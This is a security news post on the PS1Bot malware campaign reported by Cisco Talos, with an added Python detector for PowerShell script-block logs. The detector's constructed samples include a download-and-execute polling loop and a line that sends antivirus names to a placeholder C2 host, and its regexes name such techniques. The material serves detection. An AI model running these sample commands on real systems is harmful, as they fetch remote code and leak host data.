Cisco Talos has uncovered an ongoing and highly active malware campaign deploying a sophisticated, modular framework dubbed PS1Bot. Written in PowerShell and C#, this evolving threat is capable of information theft, keylogging, screen capturing, cryptocurrency wallet draining, and establishing long-term persistence on infected systems.
According to Talos, “PS1Bot features a modular design, with several modules delivered used to perform a variety of malicious activities on infected systems, including information theft, keylogging, reconnaissance and the establishment of persistent system access.” Since early 2025, fresh samples have been appearing frequently, underscoring the campaign’s rapid development cycle.
The infection chain begins with malvertising and SEO poisoning, luring victims into downloading malicious compressed archives with filenames tailored to trending search queries, such as chapter 8 medicare benefit policy manual.zip or zebra gx430t manual.zip.081. Inside, a JavaScript file named FULL DOCUMENT.js acts as a downloader, which “retrieves the next stage of the infection… employing a variety of obfuscation methods throughout 2025.”
Once executed, this loader fetches a PowerShell script from a command-and-control (C2) server. The script collects the system’s C: drive serial number to build a unique C2 URL and then enters a loop, continuously polling for and executing additional malicious modules entirely in memory.
Talos has documented multiple PS1Bot modules, each dedicated to specific malicious functions:
- Antivirus Detection – Identifies installed security software using WMI queries, then sends results to the C2 server.
- Screen Capture – Dynamically compiles C# code to capture and exfiltrate screenshots, often to monitor victim activity or steal on-screen data.
- Grabber Module – Targets “local browser storage… cryptocurrency wallet applications… and files containing passwords, sensitive strings or wallet seed phrases.” Talos observed large multilingual wordlists embedded to locate crypto recovery phrases.
- Keylogger – Uses SetWindowsHookEx() to record keystrokes and clipboard activity, sending logs back to the attacker.
- Information Collection – Performs WMI reconnaissance to determine domain membership, aiding in identifying high-value targets.
- Persistence – Creates hidden PowerShell scripts and malicious .LNK files to re-establish C2 connectivity after reboot.
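The loader and module behaviours above (drive-serial-derived C2 URL, in-memory polling loop, WMI antivirus enumeration, Add-Type-compiled C# calling SetWindowsHookEx, hidden PowerShell windows) can be turned into defender-side heuristics over PowerShell script block logging (Event ID 4104). The following is an added example written for this post, not Talos's code or anything from the samples; the cmdlet and WMI class names it matches on are assumptions about how such behaviour is typically written, and the sample script blocks are constructed.

```python
import re

# Behaviour-level indicators derived from the article's description of PS1Bot.
# Every regex listed for an indicator must match the script block for it to count.
# Cmdlet and WMI class names are assumptions (typical PowerShell spellings),
# not strings quoted from the real samples.
INDICATORS = {
    "drive_serial_lookup": [r"Win32_LogicalDisk|VolumeSerialNumber|Get-Volume"],
    "in_memory_download_exec": [
        r"Invoke-Expression|\bIEX\b",
        r"DownloadString|Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient",
    ],
    "polling_loop": [r"\bwhile\s*\(\s*\$true\s*\)"],
    "dynamic_csharp_hook": [r"\bAdd-Type\b", r"SetWindowsHookEx"],
    "av_enumeration": [r"AntiVirusProduct", r"SecurityCenter2|Get-CimInstance|Get-WmiObject"],
    "hidden_window": [r"-(w|win|windowstyle)\s+hidden\b"],
}
COMPILED = {n: [re.compile(p, re.I) for p in pats] for n, pats in INDICATORS.items()}


def classify_script_block(text, threshold=2):
    """Return matched indicator names and whether the block meets the alert threshold."""
    hits = [n for n, pats in COMPILED.items() if all(p.search(text) for p in pats)]
    return {"indicators": hits, "suspicious": len(hits) >= threshold}


# Constructed script-block contents shaped like the ScriptBlockText field of a
# 4104 event. These are illustrative, not real PS1Bot code.
SAMPLES = {
    "loader": (
        "$s = (Get-CimInstance Win32_LogicalDisk -Filter \"DeviceID='C:'\").VolumeSerialNumber\n"
        "$u = \"http://c2.example.invalid/?id=$s\"\n"
        "while ($true) { IEX (New-Object Net.WebClient).DownloadString($u); Start-Sleep 60 }\n"
    ),
    "recon": (
        "$av = Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct\n"
        "$s = (Get-CimInstance Win32_LogicalDisk -Filter \"DeviceID='C:'\").VolumeSerialNumber\n"
        "Invoke-RestMethod \"http://c2.example.invalid/?id=$s&av=$($av.displayName)\"\n"
    ),
    "admin": "Get-CimInstance Win32_OperatingSystem | Select-Object Caption, Version\n",
}


def triage(samples=SAMPLES):
    """Classify every sample; returns {name: classification}."""
    return {name: classify_script_block(text) for name, text in samples.items()}


if __name__ == "__main__":
    for name, result in triage().items():
        print(f"{name:7} suspicious={result['suspicious']} {result['indicators']}")
```

Individual indicators (a WMI query, a while loop) are common in legitimate administration, so the threshold matters: the value here is the co-occurrence of serial-number lookup, in-memory execution and polling in one script block, as the article describes for the loader.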
Talos warns that “the modular nature of the implementation… enables the rapid deployment of updates or new functionality as needed.”
The investigation revealed “significant overlap in the C2 infrastructure” with prior malware campaigns involving Skitnet and Bossnet, as well as architectural similarities to AHK Bot. Notably, both PS1Bot and AHK Bot derive C2 URLs from the drive’s serial number and rely heavily on URL parameters for communication.
While modular malware is not new, PS1Bot’s combination of in-memory execution, broad data theft capabilities, and stealth-focused persistence makes it especially dangerous. By avoiding writing most payloads to disk, it can bypass antivirus detection, while its multi-vector data theft—targeting everything from MFA tokens to cryptocurrency wallets—poses high financial and privacy risks.